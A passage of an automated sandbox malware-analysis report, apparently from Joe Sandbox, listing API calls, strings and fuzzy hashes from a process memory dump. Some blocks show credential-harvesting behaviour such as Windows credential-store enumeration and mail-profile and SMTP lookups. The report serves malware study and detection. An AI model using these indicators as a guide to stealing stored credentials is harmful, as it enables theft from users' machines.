                                                                                                        • memcpy.MSVCRT(?,?,00000014,?,00000040,00406667,00000060,?,?,?,00000040,00406667,?,?,?), ref: 004064B9
                                                                                                        • memcpy.MSVCRT(?,00000060,?,?,?,?,?,?,?,?,?,?,?,00000000,?), ref: 004064CC
                                                                                                        • memcpy.MSVCRT(?,?,00000014,?,00000040,00406667,?,?,?,?,?,?,?,?,?), ref: 004064F9
                                                                                                        • memcpy.MSVCRT(?,?,00000014,?,?,?,?,?,?,?,?,?), ref: 0040650E
                                                                                                          • Part of subcall function 00406286: memcpy.MSVCRT(?,?,00000008,?,?,?,?,?), ref: 004062B2
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 0000000F.00000002.2571066681.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                        Joe Sandbox IDA Plugin
                                                                                                        • Snapshot File: hcaresult_15_2_400000_msiexec.jbxd
                                                                                                        Similarity
                                                                                                        • API ID: memcpy$memset
                                                                                                        • String ID:
                                                                                                        • API String ID: 438689982-0
                                                                                                        APIs
                                                                                                          • Part of subcall function 0040466B: _mbscpy.MSVCRT(?,Cry,?,004039AA), ref: 004046BA
                                                                                                          • Part of subcall function 004045DB: LoadLibraryA.KERNEL32(advapi32.dll,?,0040F708,?,00000000), ref: 004045E8
                                                                                                          • Part of subcall function 004045DB: GetProcAddress.KERNEL32(00000000,CredReadA), ref: 00404601
                                                                                                          • Part of subcall function 004045DB: GetProcAddress.KERNEL32(?,CredFree), ref: 0040460D
                                                                                                          • Part of subcall function 004045DB: GetProcAddress.KERNEL32(?,CredDeleteA), ref: 00404619
                                                                                                          • Part of subcall function 004045DB: GetProcAddress.KERNEL32(?,CredEnumerateA), ref: 00404625
                                                                                                          • Part of subcall function 004045DB: GetProcAddress.KERNEL32(?,CredEnumerateW), ref: 00404631
                                                                                                          • Part of subcall function 00404734: LoadLibraryA.KERNELBASE(?,0040F715,?,00000000), ref: 0040473C
                                                                                                          • Part of subcall function 00404734: GetProcAddress.KERNEL32(00000000,?), ref: 00404754
                                                                                                        • WideCharToMultiByte.KERNEL32(00000000,00000000,00000000,?,00000100,000000FF,00000000,00000000,?,?,?,?,00000000), ref: 0040F7AE
                                                                                                        • strlen.MSVCRT ref: 0040F7BE
                                                                                                        • _mbscpy.MSVCRT(00000000,?,?,00000000), ref: 0040F7CF
                                                                                                        • LocalFree.KERNEL32(00000000,?,00000000), ref: 0040F7DC
                                                                                                        Strings
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 0000000F.00000002.2571066681.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                        Joe Sandbox IDA Plugin
                                                                                                        • Snapshot File: hcaresult_15_2_400000_msiexec.jbxd
                                                                                                        Similarity
                                                                                                        • API ID: AddressProc$LibraryLoad_mbscpy$ByteCharFreeLocalMultiWidestrlen
                                                                                                        • String ID: Passport.Net\*
                                                                                                        • API String ID: 2329438634-3671122194
                                                                                                        APIs
                                                                                                          • Part of subcall function 00403166: strchr.MSVCRT ref: 0040327B
                                                                                                        • memset.MSVCRT ref: 0040330B
                                                                                                        • GetPrivateProfileSectionA.KERNEL32(Personalities,?,000003FE,?), ref: 00403325
                                                                                                        • strchr.MSVCRT ref: 0040335A
                                                                                                          • Part of subcall function 004023E5: _mbsicmp.MSVCRT ref: 0040241D
                                                                                                        • strlen.MSVCRT ref: 0040339C
                                                                                                          • Part of subcall function 004023E5: _mbscmp.MSVCRT ref: 004023F9
                                                                                                        Strings
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 0000000F.00000002.2571066681.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                        Joe Sandbox IDA Plugin
                                                                                                        • Snapshot File: hcaresult_15_2_400000_msiexec.jbxd
                                                                                                        Similarity
                                                                                                        • API ID: strchr$PrivateProfileSection_mbscmp_mbsicmpmemsetstrlen
                                                                                                        • String ID: Personalities
                                                                                                        • API String ID: 2103853322-4287407858
                                                                                                        APIs
                                                                                                        Strings
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 0000000F.00000002.2571066681.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                        Joe Sandbox IDA Plugin
                                                                                                        • Snapshot File: hcaresult_15_2_400000_msiexec.jbxd
                                                                                                        Similarity
                                                                                                        • API ID: memset
                                                                                                        • String ID: H
                                                                                                        • API String ID: 2221118986-2852464175
                                                                                                        APIs
                                                                                                        Strings
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 0000000F.00000002.2571066681.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                        Joe Sandbox IDA Plugin
                                                                                                        • Snapshot File: hcaresult_15_2_400000_msiexec.jbxd
                                                                                                        Similarity
                                                                                                        • API ID: memcpy
                                                                                                        • String ID: out of memory$statement aborts at %d: [%s] %s$string or blob too big
                                                                                                        • API String ID: 3510742995-3170954634
                                                                                                        APIs
                                                                                                        Strings
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 0000000F.00000002.2571066681.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                        Joe Sandbox IDA Plugin
                                                                                                        • Snapshot File: hcaresult_15_2_400000_msiexec.jbxd
                                                                                                        Similarity
                                                                                                        • API ID: memcpy$memset
                                                                                                        • String ID: winWrite1$winWrite2
                                                                                                        • API String ID: 438689982-3457389245
                                                                                                        APIs
                                                                                                        Strings
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 0000000F.00000002.2571066681.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                        Joe Sandbox IDA Plugin
                                                                                                        • Snapshot File: hcaresult_15_2_400000_msiexec.jbxd
                                                                                                        Similarity
                                                                                                        • API ID: memcpymemset
                                                                                                        • String ID: winRead
                                                                                                        • API String ID: 1297977491-2759563040
                                                                                                        APIs
                                                                                                        • memset.MSVCRT ref: 0044955B
                                                                                                        • memset.MSVCRT ref: 0044956B
                                                                                                        • memcpy.MSVCRT(?,?,?,00000000,?,?,00000000,00000000,?,00000000), ref: 004495C8
                                                                                                        • memcpy.MSVCRT(?,?,?,?,?,00000000,00000000,?,00000000), ref: 00449616
                                                                                                        Strings
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 0000000F.00000002.2571066681.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                        Joe Sandbox IDA Plugin
                                                                                                        • Snapshot File: hcaresult_15_2_400000_msiexec.jbxd
                                                                                                        Similarity
                                                                                                        • API ID: memcpymemset
                                                                                                        • String ID: gj
                                                                                                        • API String ID: 1297977491-4203073231
                                                                                                        APIs
                                                                                                        • GetTempPathA.KERNEL32(00000104,?), ref: 0040C15D
                                                                                                        • GetWindowsDirectoryA.KERNEL32(?,00000104), ref: 0040C16F
                                                                                                        • GetTempFileNameA.KERNEL32(?,0044D644,00000000,?), ref: 0040C191
                                                                                                        • OpenClipboard.USER32(?), ref: 0040C1B1
                                                                                                        • GetLastError.KERNEL32 ref: 0040C1CA
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 0000000F.00000002.2571066681.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                        Joe Sandbox IDA Plugin
                                                                                                        • Snapshot File: hcaresult_15_2_400000_msiexec.jbxd
                                                                                                        Similarity
                                                                                                        • API ID: Temp$ClipboardDirectoryErrorFileLastNameOpenPathWindows
                                                                                                        • String ID:
                                                                                                        • API String ID: 1189762176-0
                                                                                                        APIs
                                                                                                        • GetParent.USER32(?), ref: 004090C2
                                                                                                        • GetWindowRect.USER32(?,?), ref: 004090CF
                                                                                                        • GetClientRect.USER32(00000000,?), ref: 004090DA
                                                                                                        • MapWindowPoints.USER32(00000000,00000000,?,00000002), ref: 004090EA
                                                                                                        • SetWindowPos.USER32(?,00000000,?,00000001,00000000,00000000,00000005), ref: 00409106
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 0000000F.00000002.2571066681.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                        Joe Sandbox IDA Plugin
                                                                                                        • Snapshot File: hcaresult_15_2_400000_msiexec.jbxd
                                                                                                        Similarity
                                                                                                        • API ID: Window$Rect$ClientParentPoints
                                                                                                        • String ID:
                                                                                                        • API String ID: 4247780290-0
                                                                                                        APIs
                                                                                                          • Part of subcall function 00407107: memset.MSVCRT ref: 00407127
                                                                                                          • Part of subcall function 00407107: GetClassNameA.USER32(?,00000000,000000FF), ref: 0040713A
                                                                                                          • Part of subcall function 00407107: _strcmpi.MSVCRT ref: 0040714C
                                                                                                        • SetBkMode.GDI32(?,00000001), ref: 0041079E
                                                                                                        • GetSysColor.USER32(00000005), ref: 004107A6
                                                                                                        • SetBkColor.GDI32(?,00000000), ref: 004107B0
                                                                                                        • SetTextColor.GDI32(?,00C00000), ref: 004107BE
                                                                                                        • GetSysColorBrush.USER32(00000005), ref: 004107C6
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 0000000F.00000002.2571066681.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                        Joe Sandbox IDA Plugin
                                                                                                        • Snapshot File: hcaresult_15_2_400000_msiexec.jbxd
                                                                                                        Similarity
                                                                                                        • API ID: Color$BrushClassModeNameText_strcmpimemset
                                                                                                        • String ID:
                                                                                                        • API String ID: 2775283111-0
                                                                                                        APIs
                                                                                                        • __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 004147CE
                                                                                                        Strings
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 0000000F.00000002.2571066681.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                        Joe Sandbox IDA Plugin
                                                                                                        • Snapshot File: hcaresult_15_2_400000_msiexec.jbxd
                                                                                                        Similarity
                                                                                                        • API ID: Unothrow_t@std@@@__ehfuncinfo$??2@
                                                                                                        • String ID: winSeekFile$winTruncate1$winTruncate2
                                                                                                        • API String ID: 885266447-2471937615
                                                                                                        APIs
                                                                                                        • _strcmpi.MSVCRT ref: 0040E134
                                                                                                        • _strcmpi.MSVCRT ref: 0040E14D
                                                                                                        • _mbscpy.MSVCRT(?,smtp,0040DE7F,0040DE7F,?,?,00000000,000000FF), ref: 0040E19A
                                                                                                        Strings
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 0000000F.00000002.2571066681.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                        Joe Sandbox IDA Plugin
                                                                                                        • Snapshot File: hcaresult_15_2_400000_msiexec.jbxd
                                                                                                        Similarity
                                                                                                        • API ID: _strcmpi$_mbscpy
                                                                                                        • String ID: smtp
                                                                                                        • API String ID: 2625860049-60245459
                                                                                                        • Opcode ID: c45caa4284447f7f2e2e6364178d5851a287a2bec06db597c6e622e98960e237
                                                                                                        • Instruction ID: 1dd5f7db1b4edf1a80ad81ce147274c535078e8a2a303909ef95c05f23963bac
                                                                                                        • Opcode Fuzzy Hash: c45caa4284447f7f2e2e6364178d5851a287a2bec06db597c6e622e98960e237
                                                                                                        • Instruction Fuzzy Hash: DB11C872500219ABEB10AB66CC41A8A7399EF40358F10453BE945F71C2EF39E9698B98
                                                                                                        APIs
                                                                                                        • memset.MSVCRT ref: 0040C28C
                                                                                                        • SetFocus.USER32(?,?), ref: 0040C314
                                                                                                          • Part of subcall function 0040C256: PostMessageA.USER32(?,00000415,00000000,00000000), ref: 0040C265
                                                                                                        Strings
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 0000000F.00000002.2571066681.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                        Joe Sandbox IDA Plugin
                                                                                                        • Snapshot File: hcaresult_15_2_400000_msiexec.jbxd
                                                                                                        Similarity
                                                                                                        • API ID: FocusMessagePostmemset
                                                                                                        • String ID: S_@$l
                                                                                                        • API String ID: 3436799508-4018740455
                                                                                                        • Opcode ID: f9fe39f7a068bdda1ebd36b4f409f4e20a0398a8366c16793ed62aa8fa7a4232
                                                                                                        • Instruction ID: f4172cee4733ded4edf5c13384372fb960b3a31eee454cf66b40e3553cb76095
                                                                                                        • Opcode Fuzzy Hash: f9fe39f7a068bdda1ebd36b4f409f4e20a0398a8366c16793ed62aa8fa7a4232
                                                                                                        • Instruction Fuzzy Hash: 1411A172900158CBDF219B14CD457DE7BB9AF81308F0800F5E94C7B296C7B45A89CFA9
                                                                                                        APIs
                                                                                                        • memset.MSVCRT ref: 004092C0
                                                                                                        • GetPrivateProfileStringA.KERNEL32(0045A550,0000000A,0044C52F,?,00001000,0045A448), ref: 004092E2
                                                                                                        • _mbscpy.MSVCRT(?,?), ref: 004092FC
                                                                                                        Strings
                                                                                                        • <html><head>%s<title>%s</title></head><body>%s <h3>%s</h3>, xrefs: 004092A9
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 0000000F.00000002.2571066681.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                        Joe Sandbox IDA Plugin
                                                                                                        • Snapshot File: hcaresult_15_2_400000_msiexec.jbxd
                                                                                                        Similarity
                                                                                                        • API ID: PrivateProfileString_mbscpymemset
                                                                                                        • String ID: <html><head>%s<title>%s</title></head><body>%s <h3>%s</h3>
                                                                                                        • API String ID: 408644273-3424043681
                                                                                                        • Opcode ID: dda02bb9c94d4f17af39156b30a74aa4a90c932e0b7e9f3942217324440be20b
                                                                                                        • Instruction ID: a8dcbc571cfa5336c44be942190f1d9429afcf202dd246abef1f156f809eb6de
                                                                                                        • Opcode Fuzzy Hash: dda02bb9c94d4f17af39156b30a74aa4a90c932e0b7e9f3942217324440be20b
                                                                                                        • Instruction Fuzzy Hash: 02F0E0725011A83AEB1297549C02FCA779CCB0D307F1440A2B749E20C1D5F8DEC44A9D
                                                                                                        APIs
                                                                                                        Strings
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 0000000F.00000002.2571066681.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                        Joe Sandbox IDA Plugin
                                                                                                        • Snapshot File: hcaresult_15_2_400000_msiexec.jbxd
                                                                                                        Similarity
                                                                                                        • API ID: _mbscpy
                                                                                                        • String ID: C^@$X$ini
                                                                                                        • API String ID: 714388716-917056472
                                                                                                        • Opcode ID: d9dcd15f5501d6044b59d83579e7760d9dc142544ad26eb0a5a2565b401737d3
                                                                                                        • Instruction ID: 848b4a5d233ab05c703a0d630411b91f0640a461eb42b4d170138ac17b774cf5
                                                                                                        • Opcode Fuzzy Hash: d9dcd15f5501d6044b59d83579e7760d9dc142544ad26eb0a5a2565b401737d3
                                                                                                        • Instruction Fuzzy Hash: F601B2B1D002489FDB50DFE9D9856CEBFF4AB08318F10802AE415F6240EB7895458F59
                                                                                                        APIs
                                                                                                          • Part of subcall function 00406FC7: memset.MSVCRT ref: 00406FD1
                                                                                                          • Part of subcall function 00406FC7: _mbscpy.MSVCRT(?,?,?,00000000,0000003C,?,?,00401018,MS Sans Serif,0000000A,00000001), ref: 00407011
                                                                                                        • CreateFontIndirectA.GDI32(?), ref: 0040101F
                                                                                                        • SendDlgItemMessageA.USER32(?,000003EC,00000030,00000000,00000000), ref: 0040103E
                                                                                                        • SendDlgItemMessageA.USER32(?,000003EE,00000030,?,00000000), ref: 0040105B
                                                                                                        Strings
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 0000000F.00000002.2571066681.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                        Joe Sandbox IDA Plugin
                                                                                                        • Snapshot File: hcaresult_15_2_400000_msiexec.jbxd
                                                                                                        Similarity
                                                                                                        • API ID: ItemMessageSend$CreateFontIndirect_mbscpymemset
                                                                                                        • String ID: MS Sans Serif
                                                                                                        • API String ID: 3492281209-168460110
                                                                                                        • Opcode ID: d4e5890e55cd272a0cdfb621d5336f544a59e77ca07302a9ad9f735f222c5d17
                                                                                                        • Instruction ID: 97d77737ff66efe52178e6fda6de2dc92fca71035f8b3f8e7b76904d62d162b3
                                                                                                        • Opcode Fuzzy Hash: d4e5890e55cd272a0cdfb621d5336f544a59e77ca07302a9ad9f735f222c5d17
                                                                                                        • Instruction Fuzzy Hash: F5F02775A4130477E7317BA0EC47F4A3BACAB41B00F044535F652B50E1D2F4A404CB48
                                                                                                        APIs
                                                                                                        Strings
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 0000000F.00000002.2571066681.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                        Joe Sandbox IDA Plugin
                                                                                                        • Snapshot File: hcaresult_15_2_400000_msiexec.jbxd
                                                                                                        Similarity
                                                                                                        • API ID: ClassName_strcmpimemset
                                                                                                        • String ID: edit
                                                                                                        • API String ID: 275601554-2167791130
                                                                                                        • Opcode ID: bf6c2209122d7ccd6bf6d4d5b504d0ca7740a040d867409a121181f8c875a0cc
                                                                                                        • Instruction ID: 4378e7120b76b93f9ba7f3ad81c4d59275eb15acd3879ac3f183c71196eabbb1
                                                                                                        • Opcode Fuzzy Hash: bf6c2209122d7ccd6bf6d4d5b504d0ca7740a040d867409a121181f8c875a0cc
                                                                                                        • Instruction Fuzzy Hash: ADE09BB2C4016A6AEB21A664DC01FE5776CDF59704F0400B6B945E2081E6A4A6884A95
                                                                                                        APIs
                                                                                                        Strings
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 0000000F.00000002.2571066681.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                        Joe Sandbox IDA Plugin
                                                                                                        • Snapshot File: hcaresult_15_2_400000_msiexec.jbxd
                                                                                                        Similarity
                                                                                                        • API ID: strlen$_mbscat
                                                                                                        • String ID: 3CD
                                                                                                        • API String ID: 3951308622-1938365332
                                                                                                        • Opcode ID: d1143cf22a6afbd37b374b0806e036797619bbf072935b8337c8bafa4bdf7e65
                                                                                                        • Instruction ID: 1107c6f19d6a4433d5fdc1d3c5cfb72f3531f1d81a70b052f8a244d3c085287a
                                                                                                        • Opcode Fuzzy Hash: d1143cf22a6afbd37b374b0806e036797619bbf072935b8337c8bafa4bdf7e65
                                                                                                        • Instruction Fuzzy Hash: 1BD0A77390C2603AE61566167C42F8E5BC1CFD433AB15081FF408D1281DA3DE881809D
                                                                                                        APIs
                                                                                                        Strings
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 0000000F.00000002.2571066681.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                        Joe Sandbox IDA Plugin
                                                                                                        • Snapshot File: hcaresult_15_2_400000_msiexec.jbxd
                                                                                                        Similarity
                                                                                                        • API ID: memset
                                                                                                        • String ID: rows deleted
                                                                                                        • API String ID: 2221118986-571615504
                                                                                                        • Opcode ID: b98c805d9f7a15f03bb69ae15e6c6b0a921ed9a197951f9464e59faa98c73a57
                                                                                                        • Instruction ID: 17dfb349c3cd8fc2c2490db290532cf881f14abfa8d6012d9aa572d9710d7201
                                                                                                        • Opcode Fuzzy Hash: b98c805d9f7a15f03bb69ae15e6c6b0a921ed9a197951f9464e59faa98c73a57
                                                                                                        • Instruction Fuzzy Hash: D5028171E00218AFDF14DFA5D981AEEBBB5FF08314F14005AF914B7291D7B9AA41CBA4
                                                                                                        APIs
                                                                                                          • Part of subcall function 004073B3: memset.MSVCRT ref: 004073C1
                                                                                                        • ??2@YAPAXI@Z.MSVCRT(00000020,?,00000000,00000000,0044409F,?,004441FB,?,00000000), ref: 004433A0
                                                                                                        • ??2@YAPAXI@Z.MSVCRT(00000020,00000000,00000000,0044409F,?,004441FB,?,00000000), ref: 004433BE
                                                                                                        • ??2@YAPAXI@Z.MSVCRT(00000014,00000000,00000000,0044409F,?,004441FB,?,00000000), ref: 004433D9
                                                                                                        • ??2@YAPAXI@Z.MSVCRT(00000014,00000000,00000000,0044409F,?,004441FB,?,00000000), ref: 00443402
                                                                                                        • ??2@YAPAXI@Z.MSVCRT(00000014,00000000,00000000,0044409F,?,004441FB,?,00000000), ref: 00443426
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 0000000F.00000002.2571066681.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                        Joe Sandbox IDA Plugin
                                                                                                        • Snapshot File: hcaresult_15_2_400000_msiexec.jbxd
                                                                                                        Similarity
                                                                                                        • API ID: ??2@$memset
                                                                                                        • String ID:
                                                                                                        • API String ID: 1860491036-0
                                                                                                        • Opcode ID: fb665ac2fefbd88b77538ab471de92cac26eee1f38b4faef847c6b5bb8c147a3
                                                                                                        • Instruction ID: bd2fcbe50e3d5b8ec1466eca70e60fda3411ba7e10a355e4f398212a99dd52d4
                                                                                                        • Opcode Fuzzy Hash: fb665ac2fefbd88b77538ab471de92cac26eee1f38b4faef847c6b5bb8c147a3
                                                                                                        • Instruction Fuzzy Hash: 973162B09107508FE751DF3A8845A16FBE4FF80B05F25486FD549CB2A2E779E5408B19
                                                                                                        APIs
                                                                                                        • memset.MSVCRT ref: 004048C2
                                                                                                        • memset.MSVCRT ref: 004048D6
                                                                                                        • memset.MSVCRT ref: 004048EA
                                                                                                        • memcpy.MSVCRT(?,00406667,?,?,00000000,000000FF,?,00000000,000000FF,?,00000000,000000FF,?,?,?), ref: 004048FC
                                                                                                        • memcpy.MSVCRT(?,00406667,?,?,00406667,?,?,00000000,000000FF,?,00000000,000000FF,?,00000000,000000FF,?), ref: 0040490E
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 0000000F.00000002.2571066681.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                        Joe Sandbox IDA Plugin
                                                                                                        • Snapshot File: hcaresult_15_2_400000_msiexec.jbxd
                                                                                                        Similarity
                                                                                                        • API ID: memset$memcpy
                                                                                                        • String ID:
                                                                                                        • API String ID: 368790112-0
                                                                                                        • Opcode ID: e33439cddf26871f1b6b72d3f102fac71f305b2afc07238da9e6d18acb06c1a9
                                                                                                        • Instruction ID: 0e4d5a8aef3e538851842ff93af65fc880b0f2046ec3e537946e92548d274f73
                                                                                                        • Opcode Fuzzy Hash: e33439cddf26871f1b6b72d3f102fac71f305b2afc07238da9e6d18acb06c1a9
                                                                                                        • Instruction Fuzzy Hash: BB2162B650115DABDF11EE68CD41EDE77ACDF95304F0040A6B708E3151D2749F448B64
                                                                                                        APIs
                                                                                                        • memset.MSVCRT ref: 0040D2C2
                                                                                                        • memset.MSVCRT ref: 0040D2D8
                                                                                                        • memset.MSVCRT ref: 0040D2EA
                                                                                                        • memcpy.MSVCRT(?,?,00000010,?,00000000,00000000,?,?,?,?,?,?,00000000,0040381A,00000000), ref: 0040D30F
                                                                                                        • memset.MSVCRT ref: 0040D319
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 0000000F.00000002.2571066681.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                        Joe Sandbox IDA Plugin
                                                                                                        • Snapshot File: hcaresult_15_2_400000_msiexec.jbxd
                                                                                                        Similarity
                                                                                                        • API ID: memset$memcpy
                                                                                                        • String ID:
                                                                                                        • API String ID: 368790112-0
                                                                                                        • Opcode ID: b4e43ced28bb4930618584d198fe59dd62a49c5b1c6a4db04c735ab4a5314c67
                                                                                                        • Instruction ID: 358c417c53aa398974aae77e4359fd90ac0a4dba5340dfd55ca125e4bb0c9b0b
                                                                                                        • Opcode Fuzzy Hash: b4e43ced28bb4930618584d198fe59dd62a49c5b1c6a4db04c735ab4a5314c67
                                                                                                        • Instruction Fuzzy Hash: 8E01D8B5A40B406BE235AE25CC03F2AB3A8DF91714F400A2EF692676C1D7B8F509915D
                                                                                                        APIs
                                                                                                        • __allrem.LIBCMT ref: 00425850
                                                                                                        • __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 00425885
                                                                                                        • __allrem.LIBCMT ref: 00425933
                                                                                                        • __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 0042597B
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 0000000F.00000002.2571066681.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                        Joe Sandbox IDA Plugin
                                                                                                        • Snapshot File: hcaresult_15_2_400000_msiexec.jbxd
                                                                                                        Similarity
                                                                                                        • API ID: Unothrow_t@std@@@__allrem__ehfuncinfo$??2@
                                                                                                        • String ID:
                                                                                                        • API String ID: 1992179935-0
                                                                                                        • Opcode ID: eeae426aa4a2dd52bce4edc8b714b0ba45551b1196620555c2276823dfb77c6c
                                                                                                        • Instruction ID: 2fc5b562d87482ee0bf7138f77baf3e4365ffd42061eb2d4d5abd72185a9e376
                                                                                                        • Opcode Fuzzy Hash: eeae426aa4a2dd52bce4edc8b714b0ba45551b1196620555c2276823dfb77c6c
                                                                                                        • Instruction Fuzzy Hash: C96180B1A00A29DFCF149B64D840AAEB7B1FF45320F68815AE548AB391D7389D81CF19
APIs
Strings
• variable number must be between ?1 and ?%d, xrefs: 0042C5C2
• too many SQL variables, xrefs: 0042C6FD
Memory Dump Source
• Source File: 0000000F.00000002.2571066681.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_15_2_400000_msiexec.jbxd
Similarity
• API ID: memset
• String ID: too many SQL variables$variable number must be between ?1 and ?%d
• API String ID: 2221118986-515162456
• Opcode ID: 60d5f5fef70a29d847aa1be0b0a9f40863d4de5ddd7e716af81dbeaf9fd2ce2b
• Instruction ID: 69d39437184f158b69242413db2932325e78deb4f0df02558d14bae7a1bb2b74
• Opcode Fuzzy Hash: 60d5f5fef70a29d847aa1be0b0a9f40863d4de5ddd7e716af81dbeaf9fd2ce2b
• Instruction Fuzzy Hash: 93518B31B00626EFDB29DF68D481BEEB7A4FF09304F50016BE811A7251D779AD51CB88
APIs
  • Part of subcall function 00410B00: RegQueryValueExA.ADVAPI32(?,?,00000000,?,?,?,?,?,00402658,?), ref: 00410B16
• WideCharToMultiByte.KERNEL32(00000000,00000000,?,000000FF,?,0000007F,00000000,00000000,?,?,00000400,00000001), ref: 004026E4
• memset.MSVCRT ref: 004026AD
  • Part of subcall function 004108E5: UuidFromStringA.RPCRT4(220D5CD0-853A-11D0-84BC-00C04FD43F8F,00000001), ref: 00410902
  • Part of subcall function 004108E5: UuidFromStringA.RPCRT4(417E2D75-84BD-11D0-84BB-00C04FD43F8F,?), ref: 00410923
  • Part of subcall function 004108E5: memcpy.MSVCRT(?,00000000,?,00000001,?,?,?,00000000), ref: 00410961
  • Part of subcall function 004108E5: CoTaskMemFree.COMBASE(00000000), ref: 00410970
• WideCharToMultiByte.KERNEL32(00000000,00000000,?,00000002,?,0000007F,00000000,00000000,00000002,00000000,?), ref: 0040279C
• LocalFree.KERNEL32(?), ref: 004027A6
Memory Dump Source
• Source File: 0000000F.00000002.2571066681.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_15_2_400000_msiexec.jbxd
Similarity
• API ID: ByteCharFreeFromMultiStringUuidWide$LocalQueryTaskValuememcpymemset
• String ID:
• API String ID: 3503910906-0
• Opcode ID: f86a270f64af7f2cfe52cb4533637fefaa5bfeff9622a9a4a07cc31b63cb9060
• Instruction ID: aa14e43d8b473801bf9d2631992dc1640396fa6537153de3cc175e43cdbeb3f4
• Opcode Fuzzy Hash: f86a270f64af7f2cfe52cb4533637fefaa5bfeff9622a9a4a07cc31b63cb9060
• Instruction Fuzzy Hash: 0B4183B1408384BFD711DB60CD85AAB77D8AF89314F044A3FF998A31C1D679DA44CB5A
APIs
• memset.MSVCRT ref: 0040C922
• SendMessageA.USER32(00000000,00000423,00000000,00000000), ref: 0040C966
• GetMenuStringA.USER32(?,00000103,?,0000004F,00000000), ref: 0040C980
• PostMessageA.USER32(?,00000402,00000000,00000000), ref: 0040CA23
Memory Dump Source
• Source File: 0000000F.00000002.2571066681.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_15_2_400000_msiexec.jbxd
Similarity
• API ID: Message$MenuPostSendStringmemset
• String ID:
• API String ID: 3798638045-0
• Opcode ID: baefdefab252ba5ebdbc5dbfb72098888a57285fb2abb1b9f47d437d3554fda2
• Instruction ID: 1bc0f942f430aed347c7303033341c470b8779a554354b53929018aa447f6f2a
• Opcode Fuzzy Hash: baefdefab252ba5ebdbc5dbfb72098888a57285fb2abb1b9f47d437d3554fda2
• Instruction Fuzzy Hash: A241D071600215EBCB24CF24C8C5B97B7A4BF05325F1483B6E958AB2D2C3789D81CBD8
APIs
  • Part of subcall function 00409DED: ??2@YAPAXI@Z.MSVCRT(00000000), ref: 00409E0E
  • Part of subcall function 00409DED: ??3@YAXPAX@Z.MSVCRT(00000000), ref: 00409ED5
• strlen.MSVCRT ref: 0040B60B
• atoi.MSVCRT(?), ref: 0040B619
• _mbsicmp.MSVCRT ref: 0040B66C
• _mbsicmp.MSVCRT ref: 0040B67F
Memory Dump Source
• Source File: 0000000F.00000002.2571066681.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
Joe Sandbox IDA Plugin
